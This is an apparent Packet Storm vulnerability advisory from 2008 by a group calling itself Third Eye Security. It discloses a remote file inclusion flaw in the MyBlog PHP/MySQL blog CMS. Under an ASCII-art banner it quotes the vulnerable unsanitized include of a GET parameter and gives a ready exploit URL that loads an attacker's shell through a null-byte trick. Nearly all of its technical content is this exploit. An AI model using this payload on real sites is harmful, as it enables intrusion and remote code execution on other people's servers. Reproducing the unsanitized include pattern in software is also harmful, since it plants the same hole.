myblogmysql-rfi.txt

2008-06-13T00:00:00
ID PACKETSTORM:67287
Type packetstorm
Reporter StAkeR
Modified 2008-06-13T00:00:00

Description

                                        
                                            `[*]================================================================================[*]  
| _____ _ _ _ _____ |  
| |_ _| |__ (_)_ __ __| | | ____| _ ___ |  
| | | | '_ \| | '__/ _` | | _|| | | |/ _ \ |  
| | | | | | | | | | (_| | | |__| |_| | __/ |   
| |_| |_| |_|_|_| \__,_| |_____\__, |\___| |  
| |___/ |  
| ____ _ _ |   
| / ___| ___ ___ _ _ _ __(_) |_ _ _ |  
| \___ \ / _ \/ __| | | | '__| | __| | | | |  
| ___) | __/ (__| |_| | | | | |_| |_| | |  
| |____/ \___|\___|\__,_|_| |_|\__|\__, | |  
| |___/ |  
[*]================================================================================[*]  
| Author: StAkeR ~ StAkeR@hotmail.it |  
[*]================================================================================[*]  
| Third Eye Security Members => Osirys,StAkeR,Over_Flow,Miclen |  
[*]================================================================================[*]   
| MyBlog PHP and MySQL Blog/CMS <= Remote File Inclusion Vulnerability |  
[*]================================================================================[*]  
| Download: http://surfnet.dl.sourceforge.net/sourceforge/myblog/os.zip |  
[*]================================================================================[*]  
| include($_GET['id'] . ".php"); |  
| games.php?id= [Your Shell] %00 |  
[*]================================================================================[*]  
  
  
`